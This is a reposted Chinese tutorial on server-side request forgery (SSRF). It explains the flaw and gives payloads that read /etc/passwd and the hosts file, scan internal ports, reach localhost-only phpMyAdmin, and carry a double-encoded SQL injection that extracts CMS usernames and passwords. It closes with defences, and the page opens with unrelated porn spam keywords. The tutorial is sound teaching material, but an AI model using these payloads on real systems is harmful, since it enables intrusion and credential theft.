国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Web漏洞之SSRF(服務(wù)器端請(qǐng)求偽造)

這篇具有很好參考價(jià)值的文章主要介紹了Web漏洞之SSRF(服務(wù)器端請(qǐng)求偽造)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

一.漏洞場(chǎng)景

服務(wù)器會(huì)根據(jù)用戶提交的URL 發(fā)送一個(gè)HTTP 請(qǐng)求。使用用戶指定的URL,Web 應(yīng)用可以獲取圖片或者文件資源等。典型的例子是百度識(shí)圖功能。

二.漏洞描述

如果沒(méi)有對(duì)用戶提交URL 和遠(yuǎn)端服務(wù)器所返回的信息做合適的驗(yàn)證或過(guò)濾,就有可能存在“請(qǐng)求偽造”的缺陷?!罢?qǐng)求偽造”,顧名思義,攻擊者偽造正常的請(qǐng)求,以達(dá)到攻擊的目的。如果“請(qǐng)求偽造”發(fā)生在服務(wù)器端,那這個(gè)漏洞就叫做“服務(wù)器端請(qǐng)求偽造”,英文名字Server Side
Request Forgery,簡(jiǎn)稱SSRF。

三.漏洞原理

SSRF是一種由攻擊者發(fā)起的偽造服務(wù)器發(fā)送的請(qǐng)求的一種攻擊。服務(wù)器接受了來(lái)自于客戶端的URL 地址,并由服務(wù)器發(fā)送該URL 請(qǐng)求。對(duì)用戶輸入的URL 沒(méi)有進(jìn)行恰當(dāng)?shù)倪^(guò)濾,導(dǎo)致任意URL 輸入。沒(méi)對(duì)響應(yīng)的結(jié)果進(jìn)行檢驗(yàn),直接輸出。

四.漏洞危害

●端口掃描;
●內(nèi)網(wǎng)Web 應(yīng)用指紋識(shí)別;
●攻擊內(nèi)網(wǎng)應(yīng)用;
●讀取本地文件;

五.漏洞評(píng)級(jí)

高危

六.漏洞驗(yàn)證

?url=file:///c:/windows/system32/drivers/etc/hosts
?url=file:///etc/passwd

七.漏洞利用

1.文件訪問(wèn)

?url=http://www.baidu.com
?url=http://www.baidu.com/img/bd_logo.png
?url=http://www.baidu.com/robots.txt

2.端口掃描

?url=http://127.0.0.1:80
?url=http://127.0.0.1:3306
?url=dict://127.0.0.1:3306
?url=http://10.10.10.1:22
?url=http://10.10.10.1:6379

3.讀取本地文件

?url=file:///c:/windows/system32/drivers/etc/hosts
?url=file:///etc/passwd
?url=file:/c:/www/ssrf/ssrf_curl.php

4.內(nèi)網(wǎng)應(yīng)用指紋識(shí)別
有些應(yīng)用是部署在內(nèi)網(wǎng)的。

<Directory "c:\www\phpMyAdmin">
#Order allow,deny
Order deny,allow
deny from all
allow from 127.0.0.1
</Directory>  
#在httpd配置文件中設(shè)置,只允許本機(jī)訪問(wèn)phpMyAdmin,但存在SSRF漏洞,就可以繞過(guò)并且可以訪問(wèn)?。。。?url=http://127.0.0.1/phpmyadmin)

內(nèi)網(wǎng)應(yīng)用指紋識(shí)別。

?url=http://127.0.0.1/phpmyadmin/readme

5.攻擊內(nèi)網(wǎng)WEB應(yīng)用
內(nèi)網(wǎng)安全通常都很薄弱

<Directory "c:\www\cms">
#Order allow,deny
Order deny,allow
deny from all
allow from 127.0.0.1
</Directory>  
#在httpd配置文件中設(shè)置,只允許本機(jī)訪問(wèn)cms,但存在SSRF漏洞,就可以繞過(guò)并且可以訪問(wèn)?。。?

通過(guò)SSRF漏洞可以實(shí)現(xiàn)對(duì)內(nèi)網(wǎng)的訪問(wèn),從而可以攻擊內(nèi)網(wǎng)應(yīng)用。僅僅通過(guò)GET方法可以攻擊的內(nèi)網(wǎng)Web應(yīng)用有很多。
例如:cms的sql注入(需要對(duì)注入的SQL語(yǔ)句進(jìn)行二次URL編碼)

?url=http://127.0.0.1/cms/show.php?
id=-33/*A*/union/*J*/select/*E*/1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15/*S*/from/*T*/cms_users
?url=http://127.0.0.1/cms/show.php?

id=-33%25%32%30union%25%32%30select%25%32%301,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15%25%32%30fr
om%25%32%30cms_users
#需要對(duì)注入的SQL語(yǔ)句進(jìn)行二次URL編碼

八.漏洞防御

1.過(guò)濾輸入
●限制協(xié)議,僅允許 http 或 https 協(xié)議;
●限制IP,避免應(yīng)用被用來(lái)獲取內(nèi)網(wǎng)數(shù)據(jù),攻擊內(nèi)網(wǎng);
●限制端口,限制請(qǐng)求端口為常用端口。
2.過(guò)濾輸出
●過(guò)濾返回信息,只要不符合要求的,全部過(guò)濾;
●統(tǒng)一錯(cuò)誤信息,讓攻擊無(wú)法對(duì)內(nèi)網(wǎng)信息進(jìn)行判斷。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-440509.html

到了這里,關(guān)于Web漏洞之SSRF(服務(wù)器端請(qǐng)求偽造)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 網(wǎng)絡(luò)安全進(jìn)階學(xué)習(xí)第四課——SSRF服務(wù)器請(qǐng)求偽造

    網(wǎng)絡(luò)安全進(jìn)階學(xué)習(xí)第四課——SSRF服務(wù)器請(qǐng)求偽造

    SSRF(Server-Side Request Forgery:服務(wù)器端請(qǐng)求偽造) 是指攻擊者能夠從易受攻擊的Web應(yīng)用程序發(fā)送精心設(shè)計(jì)的請(qǐng)求的對(duì)其他網(wǎng)站進(jìn)行攻擊。 一般情況下, SSRF攻擊的目標(biāo)是從外網(wǎng)無(wú)法訪問(wèn)的內(nèi)部系統(tǒng),也就是內(nèi)網(wǎng)。 利用一個(gè)可以發(fā)起網(wǎng)絡(luò)請(qǐng)求的服務(wù),當(dāng)做跳板來(lái)攻擊其它服務(wù) SSRF 形

    2024年02月11日
    瀏覽(30)
  • 服務(wù)端請(qǐng)求偽造(SSRF)及漏洞復(fù)現(xiàn)

    服務(wù)端請(qǐng)求偽造(SSRF)及漏洞復(fù)現(xiàn)

    服務(wù)器會(huì)根據(jù)用戶提交的URL發(fā)送一個(gè)HTTP請(qǐng)求。使用用戶指定的URL,Web應(yīng)用可以獲取圖片或者文件資源等。典型的例子是百度識(shí)圖功能。 如果沒(méi)有對(duì)用戶提交URL和遠(yuǎn)端服務(wù)器所返回的信息做合適的驗(yàn)證或過(guò)濾,就有可能存在“請(qǐng)求偽造\\\"的缺陷?!罢?qǐng)求偽造”,顧名思義,攻擊

    2024年02月09日
    瀏覽(24)
  • 服務(wù)端請(qǐng)求偽造(SSRF)及漏洞復(fù)現(xiàn)

    服務(wù)端請(qǐng)求偽造(SSRF)及漏洞復(fù)現(xiàn)

    服務(wù)器會(huì)根據(jù)用戶提交的URL 發(fā)送一個(gè)HTTP 請(qǐng)求。使用用戶指定的URL,Web 應(yīng)用可以獲取圖片或者文件資源等。典型的例子是百度識(shí)圖功能。 如果沒(méi)有對(duì)用戶提交URL 和遠(yuǎn)端服務(wù)器所返回的信息做合適的驗(yàn)證或過(guò)濾,就有可能存在“請(qǐng)求偽造”的缺陷?!罢?qǐng)求偽造”,顧名思義,

    2024年02月09日
    瀏覽(20)
  • 新后端漏洞之----SSRF漏洞(服務(wù)端請(qǐng)求偽造)

    新后端漏洞之----SSRF漏洞(服務(wù)端請(qǐng)求偽造)

    這幾天各種技術(shù)面試接踵而至,壓得我喘不過(guò)氣了!然后面試官問(wèn)了我這個(gè)SSRF漏洞原理和利用方式以及防御手段,當(dāng)然同時(shí)還問(wèn)了好幾個(gè)Top10漏洞! 危害:一個(gè)不符合預(yù)期的請(qǐng)求就可能導(dǎo)致整個(gè)內(nèi)網(wǎng)淪陷 全名 :Server Side Request Forgery 基本原理:攻擊者構(gòu)造惡意的URL,由服務(wù)器

    2024年02月11日
    瀏覽(33)
  • 【SSRF漏洞-01】服務(wù)端請(qǐng)求偽造靶場(chǎng)實(shí)戰(zhàn)

    SSRF(Server-Side Request Forgery, 服務(wù)端請(qǐng)求偽造) 是一種 由攻擊者構(gòu)造請(qǐng)求,由服務(wù)器端發(fā)起請(qǐng)求的安全漏洞,本質(zhì)上是屬于信息泄露漏洞 。如果“請(qǐng)求偽造”發(fā)生在服務(wù)器端,那么這個(gè)漏洞就叫做“服務(wù)器端請(qǐng)求偽造”即SSRF。 SSRF是一種攻擊者發(fā)起的偽造由服務(wù)器端發(fā)起請(qǐng)求的

    2024年02月04日
    瀏覽(22)
  • CSRF(跨站請(qǐng)求偽造)和SSRF(服務(wù)端請(qǐng)求偽造)漏洞復(fù)現(xiàn):風(fēng)險(xiǎn)與防護(hù)方法

    這篇文章旨在用于網(wǎng)絡(luò)安全學(xué)習(xí),請(qǐng)勿進(jìn)行任何非法行為,否則后果自負(fù)。? 環(huán)境準(zhǔn)備 示例: 假設(shè)用戶在銀行網(wǎng)站A上登錄并保持會(huì)話活動(dòng),同時(shí)他也在瀏覽其他網(wǎng)站。攻擊者在一個(gè)不可信任的網(wǎng)站B上創(chuàng)建了一個(gè)惡意鏈接,當(dāng)用戶點(diǎn)擊該鏈接時(shí),會(huì)自動(dòng)向銀行網(wǎng)站A發(fā)送一個(gè)

    2024年02月10日
    瀏覽(98)
  • Java代碼審計(jì)安全篇-SSRF(服務(wù)端請(qǐng)求偽造)漏洞

    Java代碼審計(jì)安全篇-SSRF(服務(wù)端請(qǐng)求偽造)漏洞

    前言: ?墮落了三個(gè)月,現(xiàn)在因?yàn)楸徽覍?shí)習(xí)而困擾,著實(shí)自己能力不足,從今天開始 每天沉淀一點(diǎn)點(diǎn) ,準(zhǔn)備秋招?加油 注意: 本文章參考qax的網(wǎng)絡(luò)安全java代碼審計(jì),記錄自己的學(xué)習(xí)過(guò)程,還希望各位博主 師傅 大佬 勿噴,還希望大家指出錯(cuò)誤 SSRF漏洞? SSRF(Server-side Request

    2024年03月15日
    瀏覽(23)
  • 【burpsuite安全練兵場(chǎng)-服務(wù)端9】服務(wù)端請(qǐng)求偽造SSRF漏洞-7個(gè)實(shí)驗(yàn)(全)

    【burpsuite安全練兵場(chǎng)-服務(wù)端9】服務(wù)端請(qǐng)求偽造SSRF漏洞-7個(gè)實(shí)驗(yàn)(全)

    ?? 博主:網(wǎng)絡(luò)安全領(lǐng)域狂熱愛(ài)好者(承諾在CSDN永久無(wú)償分享文章)。 殊榮:CSDN網(wǎng)絡(luò)安全領(lǐng)域優(yōu)質(zhì)創(chuàng)作者,2022年雙十一業(yè)務(wù)安全保衛(wèi)戰(zhàn)-某廠第一名,某廠特邀數(shù)字業(yè)務(wù)安全研究員,edusrc高白帽,vulfocus、攻防世界等平臺(tái)排名100+、高校漏洞證書、cnvd原創(chuàng)漏洞證書等。 擅長(zhǎng):

    2024年02月02日
    瀏覽(27)
  • API安全——SSRF服務(wù)端請(qǐng)求偽造的原理以及防范

    SSRF全稱Server-Side Request Forgery,服務(wù)端請(qǐng)求偽造。 在最新的2023 OWASP中API 安全的Top10榜單中,ssrf排第7。 我們?cè)陂_發(fā)過(guò)程中,通常使用API 獲取遠(yuǎn)程時(shí)出現(xiàn)服務(wù)器端請(qǐng)求偽造 (SSRF) 缺陷 資源,而不驗(yàn)證用戶提供的 URL。它使攻擊者能夠 強(qiáng)制應(yīng)用程序?qū)⒕木幹频恼?qǐng)求發(fā)送到意外

    2024年02月12日
    瀏覽(25)
  • java服務(wù)器獲取ip 解讀請(qǐng)求頭 偽造ip

    目錄 一、獲取ip的代碼 二、請(qǐng)求頭解讀 三、注意事項(xiàng) 市面上流傳的JAVA/PHP服務(wù)器端獲取客戶端IP都是這樣: X-Forwarded-For 這是一個(gè) Squid 開發(fā)的字段,只有在通過(guò)了 HTTP 代理或者負(fù)載均衡服務(wù)器時(shí)才會(huì)添加該項(xiàng)。格式為X-Forwarded-For: client1, proxy1, proxy2,一般情況下,第一個(gè)ip為客

    2024年02月08日
    瀏覽(23)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包